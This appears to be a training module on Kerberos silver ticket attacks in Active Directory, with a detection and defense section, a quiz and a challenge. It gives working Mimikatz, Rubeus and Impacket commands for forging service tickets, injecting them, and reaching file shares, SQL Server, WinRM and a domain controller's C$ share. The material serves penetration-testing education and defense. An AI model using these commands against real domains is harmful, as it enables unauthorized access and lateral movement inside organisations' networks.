Silver Ticket Attack

advanced35 minWriteup

Forging service tickets for targeted access

Learning Objectives

  • Understand silver tickets
  • Extract service account hashes
  • Forge service tickets
  • Access specific services

While

are the nuclear option (forging TGTs with KRBTGT), Silver Tickets are the precision strike - forging service tickets (TGS) for specific services using the service account's hash. No KDC contact required.

Think of it this way: Golden Ticket = master key to the entire building. Silver Ticket = key to one specific room. Less powerful, but often all you need - and much stealthier since you never talk to the KDC.

No KDC Required

Silver Tickets are validated by the service itself, not the KDC. This means no Kerberos traffic to the DC - making detection much harder.

How Silver Tickets Work

1Normal Kerberos Service Access:
21. User has TGT (from KDC)
32. User requests TGS from KDC for specific service
43. KDC issues TGS encrypted with service account hash
54. User presents TGS to service
65. Service decrypts TGS, validates, grants access
7 
8Silver Ticket Attack:
91. Attacker obtains service account NTLM hash
102. Attacker forges TGS directly (no KDC contact!)
113. Attacker presents forged TGS to service
124. Service decrypts, sees valid ticket
135. Attacker has access (KDC never knew!)
14 
15Why it works:
16- Services decrypt tickets with their own hash
17- They trust the ticket contents after decryption
18- They don't verify with the KDC

Scope Limitation

Silver Tickets only grant access to the specific service you forge the ticket for. You can't use a CIFS silver ticket to access LDAP.

Requirements

1To forge a Silver Ticket you need:
2├── Service account NTLM hash (or AES key)
3├── Domain SID (S-1-5-21-...)
4├── Domain name (corp.local)
5├── Target SPN (service/hostname)
6└── Username to impersonate (Administrator)
7 
8Where to get the service hash:
9├── Kerberoasting (crack the password)
10├── DCSync (if you have rights)
11├── NTDS.dit extraction
12├── Mimikatz on machine running service
13└── Pass-the-Hash from compromised service account

Machine Accounts

Computer accounts ARE service accounts! The machine account hash (MACHINENAME$) can forge tickets for services running as SYSTEM on that machine - CIFS, HOST, HTTP, etc.

Common Service SPNs

1Service          SPN Format                    Attack Use
2──────────────────────────────────────────────────────────────
3CIFS/SMB         cifs/hostname                 File shares, PsExec
4HOST             host/hostname                 Scheduled Tasks, WMI
5HTTP             http/hostname                 Web apps, WinRM
6LDAP             ldap/hostname                 AD queries on DC
7MSSQLSvc         MSSQLSvc/hostname:1433        Database access
8WSMAN            wsman/hostname                WinRM/PowerShell
9RPCSS            rpcss/hostname                RPC services
10TERMSRV          termsrv/hostname              RDP access
11 
12Most Valuable Targets:
13├── CIFS on DC = File access to SYSVOL, C$
14├── HOST on DC = Scheduled tasks, WMI
15├── LDAP on DC = Limited AD queries
16└── CIFS on file servers = Data access

CIFS is Your Friend

CIFS (Common Internet File System) silver tickets are most useful. They grant SMB access for file shares, and tools like PsExec use SMB under the hood.

Forging Silver Tickets

Mimikatz

1606070;"># Get domain SID
2whoami /user   606070;"># Remove the RID (last part)
3606070;"># S-1-5-21-1234567890-1234567890-1234567890-1001
4606070;"># Domain SID = S-1-5-21-1234567890-1234567890-1234567890
5 
6606070;"># Forge CIFS silver ticket
7kerberos::golden /user:Administrator /domain:corp.local \
8  /sid:S-1-5-21-1234567890-1234567890-1234567890 \
9  /target:dc.corp.local /service:cifs \
10  /rc4:a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx /ptt
11 
12606070;"># Key parameters:
13606070;"># /user:      - User to impersonate
14606070;"># /domain:    - Domain name
15606070;"># /sid:       - Domain SID
16606070;"># /target:    - Target server FQDN
17606070;"># /service:   - Service name (cifs, host, http, etc.)
18606070;"># /rc4:       - Service account NTLM hash
19606070;"># /ptt        - Pass-the-Ticket (inject immediately)
20 
21606070;"># For machine account hash (CIFS on DC):
22kerberos::golden /user:Administrator /domain:corp.local \
23  /sid:S-1-5-21-... /target:dc.corp.local /service:cifs \
24  /rc4:DC_MACHINE_ACCOUNT_HASH /ptt

Impacket (Linux)

bash
1606070;"># Create silver ticket for CIFS
2ticketer.py -nthash a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx \
3  -domain-sid S-1-5-21-1234567890-1234567890-1234567890 \
4  -domain corp.local -spn cifs/dc.corp.local Administrator
5 
6606070;"># Creates Administrator.ccache file
7 
8606070;"># Use the ticket
9export KRB5CCNAME=Administrator.ccache
10 
11606070;"># Access file shares
12smbclient 606070;">//dc.corp.local/C$ -k -no-pass
13 
14606070;"># PsExec (uses CIFS)
15psexec.py -k -no-pass corp.local/Administrator@dc.corp.local

Rubeus

powershell
1606070;"># Forge silver ticket
2.\Rubeus.exe silver /user:Administrator /domain:corp.local \
3  /sid:S-1-5-21-... /target:dc.corp.local /service:cifs \
4  /rc4:a9b30e5b... /ptt
5 
6606070;"># With AES key (stealthier)
7.\Rubeus.exe silver /user:Administrator /domain:corp.local \
8  /sid:S-1-5-21-... /target:dc.corp.local /service:cifs \
9  /aes256:... /ptt

Attack Scenarios

Scenario 1: File Share Access

bash
1606070;"># You cracked a file server service account password
2606070;"># Or dumped the file server's machine account hash
3 
4606070;"># Forge CIFS ticket for file server
5ticketer.py -nthash FILE_SERVER_HASH -domain-sid S-1-5-21-... \
6  -domain corp.local -spn cifs/fileserver.corp.local Administrator
7 
8export KRB5CCNAME=Administrator.ccache
9smbclient 606070;">//fileserver.corp.local/Confidential$ -k -no-pass

Scenario 2: Database Access

bash
1606070;"># You Kerberoasted and cracked svc_sql password
2606070;"># Convert password to NTLM hash (or use -p flag)
3 
4606070;"># Forge MSSQLSvc ticket
5ticketer.py -nthash SQL_SVC_HASH -domain-sid S-1-5-21-... \
6  -domain corp.local -spn MSSQLSvc/sql.corp.local:1433 svc_sql
7 
8export KRB5CCNAME=svc_sql.ccache
9mssqlclient.py -k -no-pass corp.local/svc_sql@sql.corp.local

Scenario 3: WinRM Access

powershell
1606070;"># Forge HTTP ticket for WinRM
2kerberos::golden /user:Administrator /domain:corp.local \
3  /sid:S-1-5-21-... /target:server.corp.local /service:http \
4  /rc4:SERVER_MACHINE_HASH /ptt
5 
6606070;"># Now use WinRM
7Enter-PSSession -ComputerName server.corp.local

Scenario 4: DC Access via CIFS

1606070;"># If you have DC's machine account hash (DC01$)
2606070;"># Forge CIFS ticket for DC
3 
4606070;"># This gives you:
5├── Access to SYSVOL (GPO, scripts)
6├── Access to NETLOGON
7├── Access to C$ (if Administrator)
8└── Ability to use PsExec
9 
10606070;"># But NOT:
11├── DCSync (requires LDAP + specific rights)
12├── Creating AD objects
13└── Modifying AD

Golden vs Silver Tickets

AspectGolden TicketSilver Ticket
Ticket TypeTGTTGS
Key RequiredKRBTGT hashService account hash
ScopeEntire domainSingle service
KDC ContactYes (to get TGS)No
DetectionEasier (KDC logs)Harder (service only)
InvalidationReset KRBTGT twiceReset service password

Detection & Defense

1Detection Challenges:
2├── No TGS request to KDC (no 4769 events)
3├── Service validates ticket locally
4├── Looks like normal service access
5└── Hard to distinguish from legitimate tickets
6 
7What CAN Be Detected:
8├── Event ID 4624 - Logon with unusual account
9├── PAC validation failures (if enabled)
10├── Tickets with impossible SIDs
11├── Services accessed that user shouldn't use
12└── Unusual service-to-service authentication
13 
14Defense:
15├── Enable PAC validation (increases load)
16├── Monitor for unusual service access patterns
17├── Use Group Managed Service Accounts (gMSA)
18├── Rotate service account passwords regularly
19├── Implement credential tiering
20└── Monitor for tools like Mimikatz, Rubeus

PAC Validation

By default, services trust the PAC (Privilege Attribute Certificate) in tickets without validating with the KDC. Enabling PAC validation adds overhead but catches silver tickets.

Silver Ticket Methodology

Silver Ticket Attack Flow

1
Obtain HashGet service account hash (Kerberoast, dump, etc.)
2
Identify TargetDetermine which service to access
3
Get Domain SIDwhoami /user or Get-ADDomain
4
Forge TicketUse Mimikatz/Rubeus/ticketer.py
5
InjectPass-the-Ticket into session
6
AccessConnect to service with forged ticket

Knowledge Check

Quick Quiz
Question 1 of 3

What key difference makes silver tickets stealthier than golden tickets?

Challenges

Precision Strike

Challenge
💀 advanced

After Kerberoasting a service account, forge a silver ticket to access the service without triggering KDC-based detection.

Need a hint? (4 available)

Key Takeaways

  • Silver tickets forge TGS tickets for specific services
  • Require service account hash, not KRBTGT
  • No KDC contact = much stealthier than golden tickets
  • Limited scope - one service per ticket
  • Machine accounts work for services running as SYSTEM
  • Reset service password to invalidate